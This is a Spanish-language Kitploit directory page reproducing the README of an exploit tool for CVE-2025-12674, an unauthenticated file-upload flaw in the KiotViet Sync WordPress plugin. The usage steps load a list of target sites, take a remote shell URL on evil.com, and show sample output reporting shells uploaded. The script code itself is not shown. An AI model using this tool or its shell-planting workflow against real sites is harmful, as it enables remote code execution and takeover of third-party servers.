Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-12674 — KiotViet Sync <= 1.8.5 - Subida de archivos arbitrarios sin autenticación | Kitploit
Herramientas/GitHubGitHub/nxploited/cve-2025-12674
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de Penetración
GitHubnxploited/cve-2025-12674

CVE-2025-12674

KiotViet Sync <= 1.8.5 - Subida de archivos arbitrarios sin autenticación

Ver Repositorio
21hace 7 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-12674

KiotViet Sync <= 1.8.5 - Carga Arbitraria de Archivos No Autenticada

🐚 KiotViet Sync <= 1.8.5 - Carga Arbitraria de Archivos No Autenticada


📝 Descripción

El plugin KiotViet Sync para WordPress (versiones hasta 1.8.5 inclusive) es vulnerable a la carga arbitraria de archivos, debido a la falta de validación del tipo de archivo en la función create_media().
Esta vulnerabilidad permite a atacantes no autenticados subir archivos arbitrarios al servidor, lo que puede conducir a la ejecución remota de código.

  • CVE: CVE-2025-12674
  • CVSS: 9.8 (Crítico)

🚀 Uso

  1. Clona este repositorio o descarga el script.

  2. Prepara tus objetivos:
    Coloca un objetivo por línea en un archivo llamado list.txt.

    root@kitploit:~
    example.com
    site2.com
    http://site3.com
    
  3. Ejecuta el script de explotación:
    El nombre del script es:

    root@kitploit:~
    CVE-2025-12674.py
    
    root@kitploit:~
    python3 CVE-2025-12674.py
    
  4. Cuando se te solicite, introduce tus opciones:

    root@kitploit:~
    Enter targets file name (default: list.txt): list.txt
    Enter number of threads (default: 10): 
    Enter REMOTE SHELL URL (direct link): http://evil.com/shell.php
    ╭──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╮
    │ Loaded 1 targets. Threads: 10.                                                                                           │
    ╰──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╯
    ╭──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╮
    │ http://nxk.ddev.site                                                                                                     │
    │ Trying KiotViet exploit...                                                                                               │
    ╰──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╯
    ╔══════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════╗
    ║ ✔ Shell uploaded!                                                                                                        ║
    ║ Check here:                                                                                                              ║
    ║ http://nxk.ddev.site/wp-content/uploads/2026/01/                                                                         ║
    ║                                                                                                                          ║
    ╚══════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════╝
               Summary           
                                 
      Metric              Value  
     ─────────────────────────── 
      Total attempts          1  
      Successful shells       1  
      Failed attempts         0  
    
  • El directorio de salida para la shell subida no muestra el nombre del archivo (ya que se genera dinámicamente).

📂 Salida

  • Todas las rutas de shells exitosas se guardan en shells.txt.
  • Se realizan copias de seguridad de la salida automáticamente con marcas de tiempo.

⚠️ Aviso legal

Este script se proporciona únicamente con fines educativos y de pruebas de seguridad autorizadas.
El uso no autorizado contra sistemas que no posees o para los que no tienes permiso explícito es ilegal y poco ético.
El autor no asume ninguna responsabilidad por el mal uso o por cualquier daño causado.


👤 Autor

Nxploited (Khaled Alenazi)

Descargar herramienta